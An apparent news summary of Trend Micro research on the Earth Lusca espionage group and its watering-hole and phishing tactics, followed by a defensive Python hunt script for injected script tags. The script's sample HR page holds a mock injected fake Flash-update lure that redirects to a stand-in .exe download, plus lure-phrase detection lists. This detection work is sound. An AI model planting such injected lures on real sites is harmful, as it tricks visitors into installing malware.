Numerous factors have made attribution more difficult today than it has ever been, especially when it comes to attributing cyberespionage operations to specific threat actors, said anti-virus and security company Trend Micro.
The infrastructure and malware that threat actors use constantly evolve, and the same actor can use a totally different set of tactics, techniques, and procedures (TTPs) from one campaign to the next. In addition, several different threat actors may collaborate and share tools, infrastructure, or malware, Trend Micro added.
Since mid-2021, we have been investigating a rather elusive threat actor called ‘Earth Lusca’ that targets organizations globally via a campaign that uses traditional social engineering techniques such as spear phishing and watering holes.
The group’s primary motivation seems to be cyberespionage: the list of its victims includes high value targets such as government and educational institutions, religious movements, pro-democracy and human rights organizations in Hong Kong, Covid-19 research organizations, and the media, among others.
However, the threat actor also seems to be financially motivated, as it also took aim at gambling and cryptocurrency companies.
Previous research into the group’s activities attributed it to other threat actors such as the Winnti group due to the use of malware such as Winnti, but despite some similarities, we consider Earth Lusca a separate threat actor (we do have evidence, however, that the group is part of the “Winnti cluster,” which comprises different groups with the same origin country that share aspects of their TTPs).
Earth Lusca’s infrastructure can essentially be grouped into two “clusters.” The first cluster is built using virtual private servers (VPS), rented from a service provider, that are used for the group’s watering hole and spear phishing operations, in addition to acting as a command-and-control (C&C) server for malware.
The second cluster is made up of compromised servers running old, open-source versions of Oracle GlassFish Server. Interestingly, this second cluster performs a different role in an Earth Lusca attack — it acts as a scanning tool that searches for vulnerabilities in public-facing servers and builds traffic tunnels within the target’s network. Like the first cluster, it also serves as a C&C server, this time for Cobalt Strike.
It’s possible that the group used portions of its infrastructure (particularly the scanning aspects) for diversion in order to trick security staff into focusing on the wrong parts of the network.
In one incident, the group injected a malicious script into a target organization’s compromised HR system. The script displayed a social engineering lure, typically a fake Flash update popup or a fake DNS error page (Adobe discontinued Flash Player at the end of December 2020, so a genuine Flash update prompt should never appear), which instructed the visitor to download a file that turned out to be a Cobalt Strike loader.
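The injection described above leaves a detectable footprint in the served HTML: a script element that either loads from a host the site does not own, or carries the lure text together with a link to a downloadable payload. The following is an added example of a hunt script for that pattern, written for this page and not code from Trend Micro or from the report; the HR portal page, the host names, the lure phrases and the payload extensions are all constructed for illustration and are not indicators from the report.

```python
"""Hunt for watering-hole style script injection in saved HTML pages.

Added example, not Trend Micro's code or Earth Lusca tooling. It flags
<script> elements loaded from hosts outside the site's own origin, and
inline scripts that combine a fake-update / fake-error lure with a link to
a downloadable payload. All names and sample data below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Lure phrases typical of fake-update / fake-error social engineering (constructed list).
LURE_TERMS = ("flash player", "flash update", "dns error", "update required")
# Direct links to payload-like file types inside script text (constructed list).
DOWNLOAD_URL = re.compile(r"https?://[^\s'\"<>]+\.(?:exe|msi|zip|hta|scr|dmg)\b", re.I)


class _ScriptCollector(HTMLParser):
    """Collects every <script> element as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies verbatim through handle_data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def find_injected_scripts(html, first_party_hosts):
    """Return a list of (reason, detail) findings for scripts that look injected.

    first_party_hosts: lowercase host names the site legitimately serves scripts from.
    Relative script paths are treated as first-party.
    """
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src, body in collector.scripts:
        if src is not None:
            host = urlparse(src).hostname or ""      # handles https://, http:// and //host/ forms
            if host and host.lower() not in first_party_hosts:
                findings.append(("third-party-src", src))
            continue
        lowered = body.lower()
        has_lure = any(term in lowered for term in LURE_TERMS)
        downloads = DOWNLOAD_URL.findall(body)
        if has_lure and downloads:
            findings.append(("lure-with-download", downloads[0]))
    return findings


# Constructed sample: a first-party HR portal page with two injected elements.
FIRST_PARTY = {"hr.example-corp.test"}
SAMPLE_PAGE = """<html><head><title>HR Portal</title>
<script src="/static/app.js"></script>
<script src="https://hr.example-corp.test/static/jquery.js"></script>
<script src="//cdn.update-check.example.test/check.js"></script>
</head><body>
<h1>Employee Self-Service</h1>
<script>
/* injected */
if (!document.cookie.match(/seen=1/)) {
  alert("Your Flash Player is out of date. Please install the update to continue.");
  window.location = "https://update-cdn.example.test/flashplayer_update.exe";
}
</script>
</body></html>"""


def scan_sample():
    """Run the hunt over the constructed sample page."""
    return find_injected_scripts(SAMPLE_PAGE, FIRST_PARTY)


if __name__ == "__main__":
    for reason, detail in scan_sample():
        print(f"{reason}: {detail}")
```

In practice the page would come from a periodic fetch of the organization's own public-facing portals (or from proxy logs), and the first-party host set from the site's real asset inventory; the third-party-source check is the more robust of the two heuristics, since lure wording changes between campaigns while an unexpected script origin does not.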
Read the full report here (PDF file).